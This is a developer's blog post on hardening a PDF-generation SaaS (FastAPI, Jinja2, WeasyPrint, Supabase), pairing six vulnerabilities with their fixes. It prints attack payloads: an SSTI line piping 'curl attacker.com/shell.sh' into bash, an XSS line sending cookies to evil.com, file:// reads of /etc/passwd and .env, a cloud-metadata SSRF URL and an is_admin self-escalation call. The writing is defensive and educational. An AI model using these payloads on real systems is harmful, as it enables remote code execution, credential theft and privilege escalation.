Four months ago, I set myself a challenge: launch a SaaS solving a pain point from my previous job, generating PDFs from templates via an API.
In 2026, you don't build alone. Claude wrote most of the code. I understand how it all works conceptually, but I couldn't tell you every implementation detail.
One week before launch, I blocked the week to stress-test the whole codebase for security.
Spoiler: out of the box, Claude Code hadn't applied a single security measure.
To be honest, it wasn't in my CLAUDE.md, and that was intentional. I was building a WYSIWYG editor with HTML templating, and I didn't want the model second-guessing every line with sanitization that would break the core feature. So I never asked for it.
Armed with Claude and a friend who works in cybersecurity, we went hunting. Claude caught most of the obvious holes I'll describe below. But for vulnerabilities 3 and 6, we had to feed it the attack path before it understood the problem.
Here's what we found.
## The Stack
- Frontend/CRUD: Next.js
- PDF API: FastAPI (Python)
- Template engine: Jinja2
- HTML to PDF: WeasyPrint
- Database/Auth: Supabase (PostgreSQL + Row Level Security)
- Hosting: Vercel + Google Cloud Run
The core feature: users create HTML/CSS templates with {{variables}}, then call an API with JSON data to generate PDFs.
```python
# Simplified flow
html = user_template  # "Hello {{name}}!"
data = {"name": "Alice"}
rendered = jinja2.Template(html).render(**data)  # "Hello Alice!"
pdf = weasyprint.HTML(string=rendered).write_pdf()
```
What could go wrong?
## Vulnerability 1: Server-Side Template Injection (SSTI)

**Severity: Critical**

Jinja2's default `Environment` class lets template expressions reach arbitrary Python objects and, from there, execute code.

### The Attack

```
{{ ''.__class__.__mro__[1].__subclasses__() }}
```
This Python expression:
- Gets the empty string's class (`str`)
- Walks up the inheritance tree to `object`
- Lists all subclasses of `object`
From there, an attacker can find dangerous classes like `subprocess.Popen` and achieve Remote Code Execution (the subclass index varies by Python version):

```
{{ ''.__class__.__mro__[1].__subclasses__()[40]('/bin/bash -c "curl attacker.com/shell.sh | bash"', shell=True) }}
```
### The Fix

Jinja2 ships a `SandboxedEnvironment` that blocks access to dangerous attributes:

```python
from jinja2 import BaseLoader
from jinja2.sandbox import SandboxedEnvironment

class JinjaTemplateEngine:
    def __init__(self):
        # SandboxedEnvironment prevents SSTI attacks
        self.env = SandboxedEnvironment(
            loader=BaseLoader(),
            autoescape=False,
        )

    def render(self, html: str, data: dict) -> str:
        template = self.env.from_string(html)
        return template.render(**data)
```
The sandbox blocks access to `__class__`, `__mro__`, `__subclasses__()`, and other dangerous attributes.
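To see the sandbox in action, here's a minimal sketch (assuming Jinja2 is installed): a benign template renders normally, while the SSTI payload is rejected at render time.

```python
from jinja2.exceptions import SecurityError
from jinja2.sandbox import SandboxedEnvironment

env = SandboxedEnvironment()

# Benign templates render exactly as before
print(env.from_string("Hello {{ name }}!").render(name="Alice"))  # Hello Alice!

# The SSTI payload is blocked when the expression touches __class__
try:
    env.from_string("{{ ''.__class__.__mro__ }}").render()
except SecurityError as exc:
    print(f"blocked: {exc}")
```

Note that the sandbox raises at render time, not parse time: the template compiles fine, but attribute access goes through the sandbox's safety checks.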
## Vulnerability 2: XSS in Templates

**Severity: High**

Users write HTML templates. That HTML gets rendered in the browser when they preview it in the editor.

### The Attack

```html
<svg><script>fetch('https://evil.com/steal?c='+document.cookie)</script></svg>
```
A malicious user creates a template with embedded JavaScript. When another user opens that template in the editor, the script runs and steals their session. Not a big deal since I don't allow template sharing, but risky if, for example, I load a customer's template during a support session.
### The Fix

Sanitize HTML before storing or rendering:

```python
import nh3

def sanitize_html(html: str) -> str:
    return nh3.clean(
        html,
        tags={"div", "span", "p", "h1", "h2", "h3", "table", "tr", "td", "th",
              "img", "style", "header", "footer", "section"},
        attributes={
            "*": {"class", "id", "style"},
            "img": {"src", "alt", "width", "height"},
        },
    )
```
The nh3 library (Rust-based, fast) strips all `<script>` tags, event handlers like `onclick`, and other XSS vectors while keeping the HTML structure intact.
## Vulnerability 3: Local File Inclusion (LFI)

This one is interesting. Claude couldn't find it, and only fixed it partially. Let me explain.

**Severity: Critical**

WeasyPrint processes HTML like a browser - including fetching resources. By default, it allows the `file://` protocol.
### The Attack

```html
<link rel="attachment" href="file:///etc/passwd">
```

Open the resulting PDF in Firefox, and `/etc/passwd` is embedded as an attachment. The same works for:

```html
<img src="file:///app/backend/.env">
<link href="file:///proc/self/environ" rel="stylesheet">
```

An attacker could read environment variables (API keys, database credentials), source code, or any file the server process can access.
### The Fix

A custom URL fetcher that blocks `file://`:

```python
from urllib.parse import urlparse

from weasyprint import HTML, default_url_fetcher

class URLFetcherSecurityError(Exception):
    """Raised when a template tries to fetch a forbidden resource."""

def secure_url_fetcher(url: str, timeout: int = 10, ssl_context=None):
    parsed = urlparse(url)
    scheme = parsed.scheme.lower()

    # Block file:// protocol
    if scheme == 'file':
        raise URLFetcherSecurityError(
            f"Access to local files is not allowed: {url}"
        )

    # Allow data: URLs (inline images)
    if scheme == 'data':
        return default_url_fetcher(url, timeout=timeout, ssl_context=ssl_context)

    # Only allow http/https
    if scheme not in ('http', 'https', ''):
        raise URLFetcherSecurityError(f"URL scheme '{scheme}' is not allowed")

    return default_url_fetcher(url, timeout=timeout, ssl_context=ssl_context)

# Apply to all WeasyPrint calls
HTML(string=html, url_fetcher=secure_url_fetcher)
```
Claude sanitized templates before saving to the database. Good.
But guess what? Templates aren't the only attack vector. This one is tricky, and Claude couldn't find it at all.

We also have a preview endpoint. It doesn't generate a PDF; it just renders the template as HTML. The endpoint is only for authenticated users, but here's the catch: grab your JWT from the browser's developer tools, reuse it in a script, and you can send arbitrary HTML straight to the endpoint, skipping the sanitization that runs on save.
## Vulnerability 4: SSRF to Internal IPs

**Severity: High**

Blocking `file://` isn't enough. HTML can reference external images and stylesheets. On cloud platforms, that's a problem.

### The Attack

```html
<img src="http://169.254.169.254/latest/meta-data/iam/security-credentials/">
```
That IP is the cloud metadata endpoint. On GCP, AWS, and Azure, it returns instance credentials, service account tokens, and other secrets.
Also dangerous:

```html
<img src="http://10.0.0.1/admin">   <!-- Internal services -->
<img src="http://localhost:6379/">  <!-- Redis? -->
```
### The Fix
Block all private IP ranges. We used a library for this.
## Vulnerability 5: DNS Rebinding (SSRF Bypass)

Not sure this one is a real-world threat, but Claude flagged it, so we fixed it anyway.

**Severity: Medium**

The SSRF fix checks if the hostname is a private IP. But what if the hostname resolves to a private IP?

### The Attack

1. Attacker owns `evil.com`
2. Configures DNS with a short TTL:
   - First query: `evil.com` → `203.0.113.50` (public IP, passes validation)
   - After TTL expires: `evil.com` → `169.254.169.254` (metadata!)
3. Sends HTML: `<img src="http://evil.com/image.png">`
4. Our validation checks "evil.com": not a blocked hostname, not an IP, so it passes
5. WeasyPrint resolves DNS again (rebind happened) → fetches `http://169.254.169.254/`
### The Fix
Resolve the hostname and validate the actual IP before fetching:
```python
import socket
from urllib.parse import urlparse

def _resolve_hostname(hostname: str) -> list[str]:
    try:
        results = socket.getaddrinfo(hostname, None, socket.AF_UNSPEC)
        return list(set(r[4][0] for r in results))
    except socket.gaierror:
        return []

def secure_url_fetcher(url: str, timeout: int = 10, ssl_context=None):
    # ... existing checks ...
    hostname = urlparse(url).hostname or ""

    # Resolve hostname and validate ALL resulting IPs
    resolved_ips = _resolve_hostname(hostname)
    if not resolved_ips:
        raise URLFetcherSecurityError(f"Could not resolve hostname: {hostname}")

    for ip_str in resolved_ips:
        if _is_private_ip(ip_str):
            raise URLFetcherSecurityError(
                f"Hostname '{hostname}' resolves to a private IP address"
            )

    return default_url_fetcher(url, timeout=timeout, ssl_context=ssl_context)
```
## Vulnerability 6: Supabase RLS Bypass

Claude couldn't find this one either - at least not in defense mode. But it found it instantly in attack mode. We ran Claude in two scenarios: "look at this code and tell me what's wrong" vs "here's a Supabase app, try to hack it." Night and day.

**Severity: Critical**

Supabase uses Row Level Security to restrict data access. My policies looked fine:

```sql
CREATE POLICY "Users can view own templates"
  ON templates FOR SELECT
  USING (auth.uid() = user_id);
```
Users can only see their own templates. Great.
### The Attack

The `profiles` table had an `is_admin` column. The RLS policy for admin endpoints checked this column:

```sql
CREATE POLICY "Admins can view all templates"
  ON templates FOR SELECT
  USING (
    EXISTS (
      SELECT 1 FROM profiles
      WHERE profiles.id = auth.uid()
        AND profiles.is_admin = true
    )
  );
```
The problem: users could update their own profile. Including `is_admin`.

```js
// Any authenticated user could do this
await supabase
  .from('profiles')
  .update({ is_admin: true })
  .eq('id', myUserId)
```
Instant admin access.
### The Fix

Column-level security: remove `is_admin` from the set of columns clients can update.

```sql
-- Profiles update policy: the row check stays the same
CREATE POLICY "Users can update own profile"
  ON profiles FOR UPDATE
  USING (auth.uid() = id)
  WITH CHECK (auth.uid() = id);

-- Then use a security definer function for admin checks
-- that reads from a separate, locked-down table
```
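Note that an RLS policy only restricts which rows a user can touch, not which columns. The column restriction itself can be expressed with Postgres column-level grants. A sketch, assuming Supabase's standard `authenticated` role and hypothetical profile columns (`display_name`, `avatar_url`):

```sql
-- Revoke blanket UPDATE, then grant it back column by column.
-- is_admin is deliberately absent from the grant list.
REVOKE UPDATE ON profiles FROM authenticated;
GRANT UPDATE (display_name, avatar_url) ON profiles TO authenticated;
```

With this in place, an UPDATE that mentions `is_admin` fails with a permission error before RLS is even evaluated.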
## What I learned
The biggest lesson wasn't about any specific vulnerability. LLMs are blind to attack paths when they're reviewing code. Ask Claude "what's wrong with this?" and it checks for patterns it knows are bad. Some vulnerabilities hide in plain sight though - they're not in any single file, they're in how pieces interact.
Put the same LLM in attack mode - "here's the app, break it" - and suddenly it thinks like an attacker. It chains things together. It asks "what if I do this, then this?" That's when it found the RLS bypass in seconds.
If you're using AI for security reviews, don't just ask it to check your code. Give it a target and tell it to hack it.
Hope this helps some fellow builders.
Vince